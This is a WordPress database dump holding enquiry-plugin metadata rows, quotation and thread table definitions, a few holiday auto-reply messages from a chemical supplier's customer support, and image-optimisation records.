INSERT INTO `wp_enquiry_meta` VALUES (688, 1062, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (689, 1063, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (690, 1064, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (691, 1065, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (692, 1066, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (693, 1067, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (694, 1068, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (695, 1069, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (696, 1070, 'Product Quantity', '10'); 
INSERT INTO `wp_enquiry_meta` VALUES (697, 1071, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (698, 1072, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (699, 1073, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (700, 1074, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (701, 1075, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (702, 1076, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (703, 1077, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (704, 1078, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (705, 1079, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (706, 1080, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (707, 1081, 'Product Quantity', '2'); 
INSERT INTO `wp_enquiry_meta` VALUES (708, 1082, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (709, 1083, 'Product Quantity', '100'); 
INSERT INTO `wp_enquiry_meta` VALUES (710, 1084, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (711, 1085, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (712, 1086, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (713, 1087, 'Product Quantity', '5'); 
INSERT INTO `wp_enquiry_meta` VALUES (714, 1088, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (715, 1089, 'Product Quantity', '9'); 
INSERT INTO `wp_enquiry_meta` VALUES (716, 1090, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (717, 1091, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (718, 1092, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (719, 1093, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (720, 1094, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (721, 1095, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (722, 1096, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (723, 1097, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (724, 1098, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (725, 1099, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (726, 1100, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (727, 1101, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (728, 1102, 'Product Quantity', '3'); 
INSERT INTO `wp_enquiry_meta` VALUES (729, 1103, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (730, 1104, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (731, 1105, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (732, 1106, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (733, 1107, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (734, 1108, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (735, 1109, 'Product Quantity', '0'); 
INSERT INTO `wp_enquiry_meta` VALUES (736, 1110, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (737, 1111, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (738, 1112, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (739, 1113, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (740, 1114, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (741, 1115, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (742, 1116, 'Product Quantity', '8'); 
INSERT INTO `wp_enquiry_meta` VALUES (743, 1117, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (744, 1118, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (745, 1119, 'Product Quantity', '24'); 
INSERT INTO `wp_enquiry_meta` VALUES (746, 1120, 'Product Quantity', '10'); 
INSERT INTO `wp_enquiry_meta` VALUES (747, 1121, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (748, 1122, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (749, 1123, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (750, 1124, 'Product Quantity', '100'); 
INSERT INTO `wp_enquiry_meta` VALUES (751, 1125, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (752, 1126, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (753, 1127, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (754, 1128, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (755, 1129, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (756, 1130, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (757, 1131, 'Product Quantity', '120'); 
INSERT INTO `wp_enquiry_meta` VALUES (758, 1132, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (759, 1133, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (760, 1134, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (761, 1135, 'Product Quantity', '2'); 
INSERT INTO `wp_enquiry_meta` VALUES (762, 1136, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (763, 1137, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (764, 1138, 'Product Quantity', '4'); 
INSERT INTO `wp_enquiry_meta` VALUES (765, 1139, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (766, 1140, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (767, 1141, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (768, 1142, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (769, 1143, 'Product Quantity', '3'); 
INSERT INTO `wp_enquiry_meta` VALUES (770, 1144, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (771, 1145, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (772, 1146, 'Product Quantity', '3'); 
INSERT INTO `wp_enquiry_meta` VALUES (773, 1147, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (774, 1148, 'Product Quantity', '10'); 
INSERT INTO `wp_enquiry_meta` VALUES (775, 1149, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (776, 1150, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (777, 1151, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (778, 1152, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (779, 1153, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (780, 1154, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (781, 1155, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (782, 1156, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (783, 1157, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (784, 1158, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (785, 1159, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (786, 1160, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (787, 1161, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (788, 1162, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (789, 1163, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (790, 1164, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (791, 1165, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (792, 1166, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (793, 1167, 'Product Quantity', '5'); 
INSERT INTO `wp_enquiry_meta` VALUES (794, 1168, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (795, 1169, 'Product Quantity', '224'); 
INSERT INTO `wp_enquiry_meta` VALUES (796, 1170, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (797, 1171, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (798, 1172, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (799, 1173, 'Product Quantity', '10'); 
INSERT INTO `wp_enquiry_meta` VALUES (800, 1174, 'Product Quantity', '12'); 
INSERT INTO `wp_enquiry_meta` VALUES (801, 1175, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (802, 1176, 'Product Quantity', '200'); 
INSERT INTO `wp_enquiry_meta` VALUES (803, 1177, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (804, 1178, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (805, 1179, 'Product Quantity', '12'); 
INSERT INTO `wp_enquiry_meta` VALUES (806, 1180, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (807, 1181, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (808, 1182, 'Product Quantity', '2'); 
INSERT INTO `wp_enquiry_meta` VALUES (809, 1183, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (810, 1184, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (811, 1185, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (812, 1186, 'Product Quantity', '2'); 
INSERT INTO `wp_enquiry_meta` VALUES (813, 1187, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (814, 1188, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (815, 1189, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (816, 1190, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (817, 1191, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (818, 1192, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (819, 1193, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (820, 1194, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (821, 1195, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (822, 1196, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (823, 1197, 'Product Quantity', '7'); 
INSERT INTO `wp_enquiry_meta` VALUES (824, 1198, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (825, 1199, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (826, 1200, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (827, 1201, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (828, 1202, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (829, 1203, 'Product Quantity', '4'); 
INSERT INTO `wp_enquiry_meta` VALUES (830, 1204, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (831, 1205, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (832, 1206, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (833, 1207, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (834, 1208, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (835, 1209, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (836, 1210, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (837, 1211, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (838, 1212, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (839, 1213, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (840, 1214, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (841, 1215, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (842, 1216, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (843, 1217, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (844, 1218, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (845, 1219, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (846, 1220, 'Product Quantity', '24'); 
INSERT INTO `wp_enquiry_meta` VALUES (847, 1221, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (848, 1222, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (849, 1223, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (850, 1224, 'Product Quantity', '2'); 
INSERT INTO `wp_enquiry_meta` VALUES (851, 1225, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (852, 1226, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (853, 1227, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (854, 1228, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (855, 1229, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (856, 1230, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (857, 1231, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (858, 1232, 'Product Quantity', '12'); 
INSERT INTO `wp_enquiry_meta` VALUES (859, 1233, 'Product Quantity', '2'); 
INSERT INTO `wp_enquiry_meta` VALUES (860, 1234, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (861, 1235, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (862, 1236, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (863, 1237, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (864, 1238, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (865, 1239, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (866, 1240, 'Product Quantity', '12'); 
INSERT INTO `wp_enquiry_meta` VALUES (867, 1241, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (868, 1242, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (869, 1243, 'Product Quantity', '3'); 
INSERT INTO `wp_enquiry_meta` VALUES (870, 1244, 'Product Quantity', '12'); 
INSERT INTO `wp_enquiry_meta` VALUES (871, 1245, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (872, 1246, 'Product Quantity', '12'); 
INSERT INTO `wp_enquiry_meta` VALUES (873, 1247, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (874, 1248, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (875, 1249, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (876, 1250, 'Product Quantity', '10'); 
INSERT INTO `wp_enquiry_meta` VALUES (877, 1251, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (878, 1252, 'Product Quantity', '6'); 
INSERT INTO `wp_enquiry_meta` VALUES (879, 1253, 'Product Quantity', '12'); 
INSERT INTO `wp_enquiry_meta` VALUES (880, 1254, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (881, 1255, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (882, 1256, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (883, 1257, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (884, 1258, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (885, 1259, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (886, 1260, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (887, 1261, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (888, 1262, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (889, 1263, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (890, 1264, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (891, 1265, 'Product Quantity', '5'); 
INSERT INTO `wp_enquiry_meta` VALUES (892, 1266, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (893, 1267, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (894, 1268, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (895, 1269, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (896, 1270, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (897, 1271, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (898, 1272, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (899, 1273, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (900, 1274, 'Product Quantity', '24'); 
INSERT INTO `wp_enquiry_meta` VALUES (901, 1275, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (902, 1276, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (903, 1277, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (904, 1278, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (905, 1279, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (906, 1280, 'Product Quantity', '5'); 
INSERT INTO `wp_enquiry_meta` VALUES (907, 1281, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (908, 1282, 'Product Quantity', '10'); 
INSERT INTO `wp_enquiry_meta` VALUES (909, 1283, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (910, 1284, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (911, 1285, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (912, 1286, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (913, 1287, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (914, 1288, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (915, 1289, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (916, 1290, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (917, 1291, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (918, 1292, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (919, 1293, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (920, 1294, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (921, 1295, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (922, 1296, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (923, 1297, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (924, 1298, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (925, 1299, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (926, 1300, 'Product Quantity', '4'); 
INSERT INTO `wp_enquiry_meta` VALUES (927, 1301, 'Product Quantity', '1'); 
INSERT INTO `wp_enquiry_meta` VALUES (928, 1302, 'enquiry_lang_code', ''); 
INSERT INTO `wp_enquiry_meta` VALUES (929, 1302, 'quotation_lang_code', ''); 
INSERT INTO `wp_enquiry_meta` VALUES (930, 1302, '_unread_enquiry', 'yes'); 
INSERT INTO `wp_enquiry_meta` VALUES (931, 1303, 'enquiry_lang_code', ''); 
INSERT INTO `wp_enquiry_meta` VALUES (932, 1303, 'quotation_lang_code', ''); 
INSERT INTO `wp_enquiry_meta` VALUES (933, 1303, '_unread_enquiry', 'yes'); 
INSERT INTO `wp_enquiry_meta` VALUES (934, 1304, 'enquiry_lang_code', ''); 
INSERT INTO `wp_enquiry_meta` VALUES (935, 1304, 'quotation_lang_code', ''); 
INSERT INTO `wp_enquiry_meta` VALUES (936, 1304, '_unread_enquiry', 'no'); 
INSERT INTO `wp_enquiry_meta` VALUES (937, 1305, 'enquiry_lang_code', ''); 
INSERT INTO `wp_enquiry_meta` VALUES (938, 1305, 'quotation_lang_code', ''); 
INSERT INTO `wp_enquiry_meta` VALUES (939, 1305, '_unread_enquiry', 'yes'); 
INSERT INTO `wp_enquiry_meta` VALUES (940, 1306, 'enquiry_lang_code', ''); 
INSERT INTO `wp_enquiry_meta` VALUES (941, 1306, 'quotation_lang_code', ''); 
INSERT INTO `wp_enquiry_meta` VALUES (942, 1306, '_unread_enquiry', 'yes'); 
INSERT INTO `wp_enquiry_meta` VALUES (943, 1307, 'enquiry_lang_code', ''); 
INSERT INTO `wp_enquiry_meta` VALUES (944, 1307, 'quotation_lang_code', ''); 
INSERT INTO `wp_enquiry_meta` VALUES (945, 1307, '_unread_enquiry', 'yes');
#
# End of data contents of table `wp_enquiry_meta`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_enquiry_quotation`


#
# Delete any existing table `wp_enquiry_quotation`
#

DROP TABLE IF EXISTS `wp_enquiry_quotation`;


#
# Table structure of table `wp_enquiry_quotation`
#

CREATE TABLE `wp_enquiry_quotation` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `enquiry_id` bigint(20) NOT NULL,
  `product_id` bigint(20) NOT NULL,
  `newprice` float NOT NULL,
  `quantity` bigint(20) NOT NULL,
  `oldprice` float NOT NULL,
  `variation_id` bigint(20) DEFAULT NULL,
  `variation` longtext COLLATE utf8mb4_unicode_ci,
  `show_price` varchar(5) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `variation_index_in_enquiry` bigint(20) DEFAULT NULL,
  PRIMARY KEY (`ID`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_enquiry_quotation`
#

#
# End of data contents of table `wp_enquiry_quotation`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_enquiry_quotation_version`


#
# Delete any existing table `wp_enquiry_quotation_version`
#

DROP TABLE IF EXISTS `wp_enquiry_quotation_version`;


#
# Table structure of table `wp_enquiry_quotation_version`
#

CREATE TABLE `wp_enquiry_quotation_version` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `enquiry_id` bigint(20) NOT NULL,
  `version` bigint(20) NOT NULL,
  `product_id` bigint(20) NOT NULL,
  `newprice` float NOT NULL,
  `quantity` bigint(20) NOT NULL,
  `oldprice` float NOT NULL,
  `variation_id` bigint(20) DEFAULT NULL,
  `variation` longtext COLLATE utf8mb4_unicode_520_ci,
  `show_price` varchar(5) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `variation_index_in_enquiry` bigint(20) DEFAULT NULL,
  `version_date` datetime NOT NULL,
  `performed_by` bigint(20) DEFAULT NULL,
  PRIMARY KEY (`ID`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci ;

#
# Data contents of table `wp_enquiry_quotation_version`
#

#
# End of data contents of table `wp_enquiry_quotation_version`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_enquiry_thread`


#
# Delete any existing table `wp_enquiry_thread`
#

DROP TABLE IF EXISTS `wp_enquiry_thread`;


#
# Table structure of table `wp_enquiry_thread`
#

CREATE TABLE `wp_enquiry_thread` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `enquiry_id` int(11) DEFAULT NULL,
  `subject` varchar(200) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `message` varchar(1000) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `parent_thread` int(11) DEFAULT NULL,
  `date` datetime DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_enquiry_thread`
#
 
INSERT INTO `wp_enquiry_thread` VALUES (1, 261, 'Order MS-907 epoxy adhesive', 'Thank You for your Inquiry.\n\nDue to the USA Thanksgiving holiday, our offices are closed and will re-open on Monday.\n\n\nPlease expect a prompt reply to you inquiry when we re-open.\n\n\nThank You\nMiller-Stephenson Customer Support\n', 261, '2016-11-25 23:32:40'); 
INSERT INTO `wp_enquiry_thread` VALUES (2, 260, 'Buying 5-10 units of epoxy 907', 'Thank You for your Inquiry.\n\nDue to the USA Thanksgiving holiday, our offices are closed and will re-open on Monday.\n\n\nPlease expect a prompt reply to you inquiry when we re-open.\n\n\nThank You\nMiller-Stephenson Customer Support\n', 260, '2016-11-25 23:33:03'); 
INSERT INTO `wp_enquiry_thread` VALUES (3, 259, 'Packaging type', 'Thank You for your Inquiry.\n\nDue to the USA Thanksgiving holiday, our offices are closed and will re-open on Monday.\n\n\nPlease expect a prompt reply to you inquiry when we re-open.\n\n\nThank You\nMiller-Stephenson Customer Support\n', 259, '2016-11-25 23:33:25');
#
# End of data contents of table `wp_enquiry_thread`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_ewwwio_images`


#
# Delete any existing table `wp_ewwwio_images`
#

DROP TABLE IF EXISTS `wp_ewwwio_images`;


#
# Table structure of table `wp_ewwwio_images`
#

CREATE TABLE `wp_ewwwio_images` (
  `id` mediumint(9) NOT NULL AUTO_INCREMENT,
  `attachment_id` bigint(20) unsigned DEFAULT NULL,
  `gallery` varchar(10) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `resize` varchar(55) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `path` text COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `converted` text COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `results` varchar(55) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `image_size` int(10) unsigned DEFAULT NULL,
  `orig_size` int(10) unsigned DEFAULT NULL,
  `level` int(5) unsigned DEFAULT NULL,
  `pending` tinyint(1) NOT NULL DEFAULT '0',
  `updates` int(5) unsigned DEFAULT NULL,
  `updated` timestamp NOT NULL DEFAULT '1971-01-01 00:00:00' ON UPDATE CURRENT_TIMESTAMP,
  `trace` blob,
  UNIQUE KEY `id` (`id`),
  KEY `path_image_size` (`path`(191),`image_size`),
  KEY `attachment_info` (`gallery`(3),`attachment_id`)
) ENGINE=MyISAM AUTO_INCREMENT=51 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci ;

#
# Data contents of table `wp_ewwwio_images`
#
 
INSERT INTO `wp_ewwwio_images` VALUES (16, 3422, 'media', 'shop_single', '/home/notactiveddd/public_html/ms4/wp-content/uploads/2016/09/Krytox-510x600.jpg', '', 'Reduced by 2.3% (1.2&nbsp;KB)', 49425, 50607, NULL, 0, 1, '2017-01-10 14:52:27', ''); 
INSERT INTO `wp_ewwwio_images` VALUES (15, 3422, 'media', 'shop_catalog', '/home/notactiveddd/public_html/ms4/wp-content/uploads/2016/09/Krytox-225x225.jpg', '', 'Reduced by 4.2% (531.0&nbsp;B)', 12136, 12667, NULL, 0, 1, '2017-01-10 14:52:27', ''); 
INSERT INTO `wp_ewwwio_images` VALUES (14, 3422, 'media', 'shop_thumbnail', '/home/notactiveddd/public_html/ms4/wp-content/uploads/2016/09/Krytox-200x200.jpg', '', 'Reduced by 4.2% (423.0&nbsp;B)', 9603, 10026, NULL, 0, 1, '2017-01-10 14:52:27', ''); 
